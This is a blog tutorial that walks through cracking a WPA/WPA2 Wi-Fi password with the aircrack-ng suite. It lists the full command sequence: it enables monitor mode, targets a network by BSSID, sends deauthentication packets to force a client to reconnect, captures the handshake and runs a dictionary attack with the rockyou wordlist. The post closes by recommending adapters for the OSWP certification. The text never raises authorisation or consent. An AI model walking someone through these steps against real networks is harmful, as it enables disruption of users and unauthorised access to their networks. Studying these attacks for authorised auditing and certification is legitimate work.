Hacking Wifi (cracking Handshake)

Erik
Written by Erik on
Hacking Wifi (cracking Handshake)

Cracking the Handshake

Table of Contents

  1. Interface Configuration
  2. Stop the Processes
  3. Monitor mode
  4. Nearby Wifi networks
  5. View clients connected to the network
  6. Deauthentication Directed
  7. Password cracking
  8. Adapters for wifi auditing

1- Ifconfig (Interface Configuration)

ifconfig

  • eth0: Ethernet Interface
  • l0: Loopback Interface
  • wlan0: Wireless network interface.

2- Stop the active processes in use:

airmon-ng check kill

airmonkill

3- Start monitor mode on wlan0.

airmon-ng start wlan

startwlan0

4- See all the wifi networks near you.

airodump-ng wlan0

With the command airodump-ng wlan0 we can visualize all the packets that are traveling in real time.

airodump

Identify the target:

objetive

5- View the clients connected to the target network.

We would start using airodump-ng and filter as we wish. We can see that there is a client connected.

clients

airodump-ng --bssid 66:FB:F4:F6:38:9A wlan0 -w captura -c 1
  • – bssid: The bssid is “66:FB:F4:F6:38:9A”
  • wlan0: My monitored network card is wlan0
  • -w captura: This will be the file in which the data will be written.
  • -c 1: It is in channel 1 as shown in this way”-c 1”

6- Deauthentication Directed.

Disconnect clients connected to the network. When the client tries to reconnect to the network we can start cracking the password as we will have the necessary package.

disconnect_clients

aireplay-ng -0 10 -a 66:FB:F4:F6:38:9A wlan0
  • -0: For deauthentication
  • 10: Number of deauthentication packages to be sent
  • -a: The BSSID of the destination network.
  • wlan0: Interface name

7- Password cracking

decrypt

aircrack-ng -a2 -b  66:FB:F4:F6:38:9A -w /usr/share/wordlists/rockyou.txt captura-01.cap
  • -a: -a2 for WPA2 and -a for WPA.
  • -b: the BSSID of the destination network.
  • -w /usr/share/wordlists/rockyou.txt: is the dictionary of the passwords we will use.
  • captura-01.cap: is the file we need since it is where all the packets we have intercepted are located.

Finally we get the password:

password

Adapters for wifi audits

I recommend the Alpha Network adapters, they are of very good quality and are focused for this type of use. I have used the AWUS036ACH it works perfectly and has plenty of power. 100% recommended for certification. OSWP

adapter

Link to the official website where you can purchase these adapters.

If you have any problems installing the drivers you can see the following post where he explains how to solve the most common problems when installing the drivers.

Erik

Erik

Hi! Im Erik I love computer security and in my spare time I do bug bounty or research.
Every day I try to learn something new, no matter how small it is.